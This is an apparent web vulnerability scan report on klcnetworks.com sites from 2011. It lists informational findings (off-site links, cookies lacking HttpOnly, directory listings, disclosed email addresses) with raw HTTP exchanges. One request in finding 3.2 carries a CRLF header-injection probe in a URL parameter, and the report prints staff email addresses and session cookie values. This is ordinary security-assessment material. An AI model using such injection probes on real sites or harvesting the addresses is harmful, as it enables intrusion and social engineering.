Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<span style="font-size: 11pt; color: blue; font-family: Calibri"><a href="http://www.daxtechnologies.com/">http://www.daxtechnologies.com</a>
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.8. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=59:klc-ariticle-igs&catid=39:klc-seaport-partner&Itemid=59 HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:25:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:25:10 GMT
Vary: Accept-Encoding
Content-Length: 14916
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<p class="caption">Web Site: <a href="http://www.igs-fl.com/">http://www.igs-fl.com/</a>
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.9. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=65:klc-article-asi&catid=39:klc-seaport-partner&Itemid=59 HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:24:44 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:24:44 GMT
Vary: Accept-Encoding
Content-Length: 16498
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</span><a href="http://mce_host/
<script language='JavaScript' type='text/javascript'>
<!--
var prefix = 'm&#97;&#105;lt&#111;:';
var suffix = '';
var attribs = '';
var path = 'hr' + 'ef' + '=';
var addy31421 = 'jk&#117;&#111;' + '&#64;';
addy31421 = addy31421 + '&#97;c&#117;sys&#105;nc' + '&#46;' + 'c&#111;m';
document.write( '<a ' + path + '\'' + prefix + addy31421 + suffix + '\'' + attribs + '>' );
document.write( addy31421 );
document.write( '<\/a>' );
//-->
</script> <script language='JavaScript' type='text/javascript'>
<!--
document.write( '<span style=\'display: none;\'>' );
//-->
</script>This e-mail address is being protected from spambots. You need JavaScript enabled to view it
<script language='JavaScript' type='text/javascript'>
<!--
document.write( '</' );
document.write( 'span>' );
//-->
</script>">
<span id="detailsView_lblEpoc1Email">
...[SNIP]...
</span><a href="http://www.ckaonline.com" target="_blank" title="CKA Online"><span style="font-size: 11pt; font-family: Calibri">
...[SNIP]...
</span><a href="http://www.ckaonline.com" target="_blank" title="CKA Online"><span id="detailsView_lblEpoc1Email">
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.10. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=49&Itemid=55 HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:25:44 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:25:44 GMT
Vary: Accept-Encoding
Content-Length: 12364
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</div>
<a href="http://maps.google.com/maps?f=q&amp;source=s_q&amp;hl=en&amp;geocode=&amp;q=590+Herndon+Parkway,+Herndon,+VA&amp;sll=37.0625,-95.677068&amp;sspn=44.744674,94.482422&amp;ie=UTF8&amp;hq=&amp;hnear=590+Herndon+Pkwy,+Herndon,+Fairfax,+Virginia+20170&amp;t=h&amp;z=16" target="_blank" title="KLC Location &amp; Direction">Map</a>
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.11. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=56:klc-article-csi&catid=39:klc-seaport-partner&Itemid=59 HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:25:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:25:22 GMT
Vary: Accept-Encoding
Content-Length: 13887
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<span class="caption">Web: <a href="http://www.carsci.com/">http://www.carsci.com</a>
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.12. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=57:klc-seaport-bcde&catid=39:klc-seaport-partner&Itemid=59 HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:25:17 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:25:17 GMT
Vary: Accept-Encoding
Content-Length: 15748
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<span style="font-size: 12pt; font-family: 'Times New Roman'"><a href="http://www.bcengineeringanddesign.com/">http://www.bcengineeringanddesign.com</a>
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

2.13. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=category&id=39&Itemid=59&format=feed&type=rss HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:24:08 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:24:08 GMT
Connection: close
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 42642

<?xml version="1.0" encoding="utf-8"?>
<!-- generator="Joomla! 1.5 - Open Source Content Management" -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
   <channel>
       <title>KLC Seaport-e
...[SNIP]...
</span><a href="http://mce_host/jkuo@acusysinc.com"><span id="detailsView_lblEpoc1Email">
...[SNIP]...
</span><a href="http://www.ckaonline.com" target="_blank" title="CKA Online"><span style="font-size: 11pt; font-family: Calibri">
...[SNIP]...
</span><a href="http://www.ckaonline.com" target="_blank" title="CKA Online"><span id="detailsView_lblEpoc1Email">
...[SNIP]...
</span><a href="http://www.ckaonline.com" target="_blank" title="CKA Online"><span style="font-size: 11pt; font-family: Calibri">
...[SNIP]...
</span><a href="http://www.ckaonline.com" target="_blank" title="CKA Online"><span id="detailsView_lblEpoc1Email">
...[SNIP]...
</span><a href="http://www.ckaonline.com" target="_blank" title="CKA Online"><span style="font-size: 11pt; font-family: Calibri">
...[SNIP]...
</span><a href="http://www.ckaonline.com" target="_blank" title="CKA Online"><span id="detailsView_lblEpoc1Email">
...[SNIP]...
</span><a href="http://www.ckaonline.com" target="_blank" title="CKA Online"><span style="font-size: 11pt; font-family: Calibri">
...[SNIP]...
<p class="caption">Web Site: <a href="http://www.igs-fl.com/">http://www.igs-fl.com/</a>
...[SNIP]...
<span style="font-size: 11pt; color: blue; font-family: Calibri"><a href="http://www.daxtechnologies.com/">http://www.daxtechnologies.com</a>
...[SNIP]...
<span style="font-size: 12pt; font-family: 'Times New Roman'"><a href="http://www.bcengineeringanddesign.com/">http://www.bcengineeringanddesign.com</a>
...[SNIP]...
<span class="caption">Web: <a href="http://www.carsci.com/">http://www.carsci.com</a>
...[SNIP]...

2.14. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=article&id=48&Itemid=54 HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:25:39 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:25:40 GMT
Vary: Accept-Encoding
Content-Length: 17004
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</strong> is registered in CCR,..<a href="http://www.ccr.gov/" target="_blank" title="CCR" style="color: #333333; text-decoration: underline;">www.ccr.gov</a>, with online certifications and representations in ORCA, i.e...<a href="http://www.orca.gov/" target="_blank" title="ORCA" style="color: #333333; text-decoration: underline;">www.orca.gov</a>
...[SNIP]...
<span style="color: #000000; font-family: Helvetica; line-height: normal; font-size: medium;"><a href="https://www.gsaadvantage.gov/ref_text/GS35F0005P/0GL36A.20KSJF_GS-35F-0005P_GS35F0005PFX75.PDF" style="color: #333333; text-decoration: underline;"><span style="font-size: small;">
...[SNIP]...
<div class="ja-cert">
       
<a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" title="Our site is valid CSS" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-css.gif" border="none" alt="Our site is valid CSS" />
...[SNIP]...
</a>
       <a href="http://validator.w3.org/check/referer" target="_blank" title="Our site is valid XHTML 1.0 Transitional" style="text-decoration: none;">
       <img src="http://www.services.klcnetworks.com/templates/ja_purity/images/but-xhtml10.gif" border="none" alt="Our site is valid XHTML 1.0 Transitional" />
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 3 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.klcnetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.klcnetworks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:13:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 75463e7328b8eda0e9080729819d87e5=5mgcjoao00vkrule380hilqqe1; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Mon, 26-Dec-2011 02:13:26 GMT; path=/
Last-Modified: Wed, 05 Jan 2011 02:13:26 GMT
MS-Author-Via: DAV
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 17544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

3.2. http://www.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?option=%0D%0Ans:+netsparker056650=vuln&view=article&id=51&Itemid=58 HTTP/1.1
Referer: http://www.klcnetworks.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Component not found
Date: Wed, 05 Jan 2011 02:57:59 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 75463e7328b8eda0e9080729819d87e5=p9bc4c4jfc3u5lchp0i5qpm3h4; path=/
Last-Modified: Wed, 05 Jan 2011 02:57:59 GMT
MS-Author-Via: DAV
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

3.3. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php?option=com_content&view=category&id=39&Itemid=59 HTTP/1.1
Host: www.services.klcnetworks.com
Proxy-Connection: keep-alive
Referer: http://www.klcnetworks.com/index.php?option=com_content&view=category&id=39&Itemid=59
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:59:21 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Mon, 26-Dec-2011 02:59:22 GMT; path=/
Last-Modified: Wed, 05 Jan 2011 02:59:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 16134


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

4. Directory listing  previous  next
There are 2 instances of this issue:

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:


4.1. http://www.klcnetworks.com/templates/ja_purity/images/header/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/images/header/

Request

GET /templates/ja_purity/images/header/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/images/header/headerc.jpg)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:39 GMT
Server: Apache
MS-Author-Via: DAV
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 740

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /templates/ja_purity/images/header</title>
</head>
<body>
<h1>Index of /templates/ja_purity/images/header</h1
...[SNIP]...
<pre> <a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr> <a href="/templates/ja_purity/images/">Parent Directory</a>
...[SNIP]...

4.2. http://www.klcnetworks.com/templates/ja_purity/js/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/js/

Request

GET /templates/ja_purity/js/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/js/ja.script.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:36 GMT
Server: Apache
MS-Author-Via: DAV
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 801

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /templates/ja_purity/js</title>
</head>
<body>
<h1>Index of /templates/ja_purity/js</h1>
<pre> <a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr> <a href="/templates/ja_purity/">Parent Directory</a>
...[SNIP]...

5. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. http://www.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.php?view=article&catid=34%3Aklc-content&id=50%3Aklc-cap&format=pdf&option=com_content&Itemid=56 HTTP/1.1
Host: www.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=10qp7a03ictp600m7krtd0h6m3; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:43:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-disposition: inline; filename="klc-cap.pdf"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:43:17 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: application/pdf; charset=utf-8
Content-Length: 381206

%PDF-1.5
3 0 obj
<</Type /Page
/Parent 1 0 R
/Resources 2 0 R
/Contents 4 0 R>>
endobj
4 0 obj
<</Filter /FlateDecode /Length 624>>
stream
x..U...0...~...J..;q.>......V...!m.R..6......N...m.TM....gn.
...[SNIP]...
</S /URI /URI (mailto:shuang@klcnetworks.com)>
...[SNIP]...
</S /URI /URI (mailto:sdwarman@klcnetworks.com)>
...[SNIP]...

5.2. http://www.klcnetworks.com/index.php/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /index.php/index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /index.php/index.php?format=feed&type=rss HTTP/1.1
Host: www.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=10qp7a03ictp600m7krtd0h6m3; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:43:31 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
